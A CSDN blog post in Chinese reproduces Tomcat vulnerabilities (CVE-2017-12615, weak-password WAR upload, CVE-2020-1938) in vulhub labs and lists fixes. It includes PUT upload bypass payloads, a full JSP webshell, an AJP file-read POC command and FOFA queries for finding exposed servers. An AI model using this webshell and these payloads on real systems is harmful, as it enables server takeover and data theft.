Tomcat 漏洞

最新推荐文章于 2024-10-13 00:42:39 发布
最新推荐文章于 2024-10-13 00:42:39 发布
阅读量823 收藏 7
点赞数 25
分类专栏: 常用中间件漏洞 文章标签: tomcat java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140967529
版权

Tomcat

tomcat是一个开源而且免费的jsp服务器,默认端口:8080,它可以实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。

1.1 CVE-2017-12615

Tomcat put方法任意文件写入漏洞

环境搭建
cd vulhub/tomcat/CVE-2017-12615
vi docker-compose.yml  // 配置版本端口  -----端口8080
docker-compose up -d
漏洞复现

打开网页

image-20240806134519546

Tomcat允许适⽤put⽅法上传任意⽂件类型,但不允许jsp后缀⽂件上传,因此我们需要配合 windows的 解析漏洞.

PUT /shell.jsp%20 
PUT /shell.jsp::$DATA
PUT /shell.jsp/

抓包,请求体写jsp木马,请求方式改成PUT

image-20240806134416590

jsp木马----密码:passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

漏洞修复

设置readonly 为 true

1.2 后台弱⼝令部署war包

漏洞原理

在tomcat8环境下默认进⼊后台的密码为 tomcat/tomcat ,未修改造成未授权即可进⼊后台,或者管 理员把密码设置成弱⼝令。

影响版本

全版本(前提是⼈家存在弱⼝令)

环境搭建
cd vulhub/tomcat/tomcat8
docker-compose up -d

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

漏洞复现

image-20240806101919648

image-20240806191645812

image-20240806191252458

1.制作war包

用冰蝎生成jsp木马—>压缩到zip中—>改后缀名为.war

image-20240806184231831

image-20240806184302305

image-20240806191204297

  1. ⽂件上传成功后,默认会在⽹站根⽬录下⽣成和war包名称⼀致得⽬录,然后⽬录中得🐎就是压缩前的⽂件名
  2. image-20240806191617899

image-20240806191555201

漏洞修复
  1. 设置强⼝令
  2. 删除manger⽂件

1.3 CVE-2020-1938

Tomcat⽂件包含漏洞

漏洞原理

由于Tomcat AJP协议设计上的缺陷,攻击者通过Tomcat AJP Connector 可以读取或包含Tomcat上所有Webapp⽬录下的任意⽂件。

影响版本

Apache Tomcat 6

Tomcat 7系列 <7.0.100

Tomcat 8系列 < 8.5.51

Tomcat 9 系列 <9.0.31

环境搭建
cd vulhub-master/tomcat/CVE-2020-1938 
vi docker-compose.yml 
docker-compose up -d

image-20240806192402932

漏洞复现

tomcat默认的conf/server.xml中配置了2个Connector,⼀个为 8080 的对外提供的HTTP协议端⼝, 另外⼀个就是默认的 8009 AJP协议端⼝,两个端⼝默认均监听在外⽹ip。

image-20240806192643723

POC:

python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml  靶机IP

image-20240806193416988

漏洞修复

  1. 更新到最新版本

  2. 关闭AJP服务,修改Tomcat配置⽂件Service.xml,注释掉。

    1. <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />

  3. 配置ajp配置中的secretRequired跟secret属性来限制认证。

1.4 实战挖洞

fofa
app="tomcat"
server="Apache Tomcat" && body="Apache Tomcat"

识别:如果给你⼀个⽹站你怎么判断它使⽤了tomcat这个中间件呢

默认端⼝ 8080 
浏览器的指纹识别插件
默认管理路由 /manage/html
server头 Apache Tomcat
黑白时光les
关注
专栏目录
tomcat漏洞总结.rar
04-21
本文件包含Tomcat近几年爆发的4个严重漏洞,包含从tomcat弱口令上传,到tomcatPUT上传小马,本地权限提升一级反序列化漏洞,其中弱口令包含2本字典以及详细用法,PUT上传包含POC,反序列化和权限提升包含代码及详细...
tomcat漏洞大杂烩1
08-03
【标题】:“Tomcat漏洞大杂烩1” 【描述】:描述中提到的是一些关于Tomcat服务器的安全问题,特别是Windows环境下的一些限制以及NTFS流的特性。在Windows系统下,文件名不允许以空格结尾,这是一个操作系统级别的...
常见Tomcat漏洞
starhei.zxy的博客
08-06 2612
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
Tomcat漏洞详解
m0_64481831的博客
03-06 3027
Tomcat是一种轻量级的web服务器,主要负责运行jsp和Servlet具有任意文件写入漏洞:主要影响7.0-7.8左右,原因是因为配置不当问题(conf/web.xml文件的readonly参数定义为false),导致可以使用PUT方法进行任意文件上传。jsp绕过方法有斜杠绕过、空格绕过和::$DATA绕过(后两者都需要在Windows下)具有文件包含漏洞:主要影响6和8版本,7和9版本有少数;原因是因为AJP协议存在缺陷而导致攻击者可以构造任意参数来进行任意文件包含和读取文件。
Tomcat漏洞复现
weixin_45910629的博客
01-01 1365
tomcat是一个开源而且免费的jsp服务器,属于轻量级应用服务器。它可以实现JavaWeb程序的装载,是 配置JSP(Java Server Page)和JAVA系统必备的一款环境。
Tomcat 漏洞处理
歪比巴卜
03-01 610
要求不允许通过网址访问 Tomcat 的 example ,manager 等自带目录,我选择了最直接的办法,删除 Tomcat 中 webapps 目录下除了项目外的其它所有文件夹。即可使用 HTTPS 协议访问 网址,更规范的做法应该时是生成对应证书,见参考资料[2]。,注释掉下面的配置后重启 Tomcat。访问 Tomcat 时端口使用。修改 Tomcat 配置文件。修改 Tomcat 配置文件。,重启 Tomcat
通过升级tomcat完美解决服务器的tomcat漏洞
cooldream2009的博客
07-03 1967
软件开发完成并交付给客户,过了一段时间,客户的上级部门要求对服务器进行安全检测,通过漏洞扫描,对服务器的漏洞情况进行通报,要求限期完成漏洞修补。客户一般没有技术能力,就找到软件开发公司,帮助其解决服务器的安全问题。我们做为软件开发人员,也会帮忙解决一些服务器安全方面的问题。
Apache Tomcat 漏洞复现
来日可期的博客
09-08 5032
Tomcat7 弱密码和后端 Getshell 漏洞,Aapache Tomcat AJP任意文件读取/包含漏洞,通过 PUT 方法的 Tomcat 任意写入文件漏洞
tomcat 漏洞集合
qq_53229503的博客
09-02 7633
tomcat 漏洞集合
Tomcat漏洞
klcyl_0106的博客
05-27 514
1.Tomcat put方法任意文件上传漏洞(CVE-2017-12615) 进入环境 输入http://ip:8080 抓包并改包: PUT /shell.jsp/ HTTP/1.1 Host: your-ip:8080 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Conten
Apache Tomcat漏洞总结
热门推荐
星落的博客
04-17 2万+
CVE-2017-12615 任意写文件漏洞 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件 然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。 AJP 文件包含漏洞(CVE-2020-1938) 由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文.
Tomcat漏洞总结.rar
12-19
tomcat 漏洞总结 包括后台暴力破解 幽灵猫getshell war包getshell 任意文件上传
【编程进阶知识】探索Tomcat:深入理解高并发与高性能的秘密
最新发布
Dylaniou的博客
10-13 1114
Tomcat是一个强大而灵活的Servlet容器,适用于开发和部署各种规模的Java Web应用程序。欢迎在评论区分享您的观点和经验,让我们一起探索更多的技术奥秘!
JAVA开源】基于Vue和SpringBoot的高校学科竞赛平台
杨荧的CSDN博客
10-10 1415
教师功能有个人中心,题目类型管理,竞赛题库管理,竞赛类型管理,竞赛信息管理,报名信息管理,竞赛评分管理,参赛名单管理,晋级名单管理,获奖名单管理,竞赛总结管理,报销清单管理,成绩申诉管理,参赛信息管理,参赛信息管理,往年成绩管理,获奖情况管理。
Springboot api http并发测试请求
nsa65223的专栏
10-11 230
【代码】Springboot api http并发测试请求。
Netty 相比原生IO模型的优势
lssffy的博客
10-09 638
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
Backend - Java 基础
是萝卜干呀的博客
10-11 811
知识量决定了未来能走多远
【含开题报告+文档+PPT+源码】基于SSM框架的线上交易商城的设计与实现
码蜂窝编程-全网唯一毕设在线答疑,项目包运行成功,全套教学视频一站式辅导机构。
10-07 742
本课程演示的是一款校园二手交易系统,主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的 Java 学习者。包含:项目源码、项目文档、数据库脚本、软件工具等所有资料带你从零开始部署运行本套系统该项目附带的源码资料可作为毕设使用系统主要功能有:登录注册、公告管理、用户管理、商品管理、商品搜索、购物车、订单管理、用户私聊等模块。
Tomcat漏洞修复步骤详解
"Tomcat漏洞处理方法" 在网络安全领域,及时修复软件漏洞至关重要,尤其是对于像Apache Tomcat这样的流行Java应用服务器。Apache Tomcat是许多企业级应用的基础,因此确保其安全性是运维工作的重要部分。本资源主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值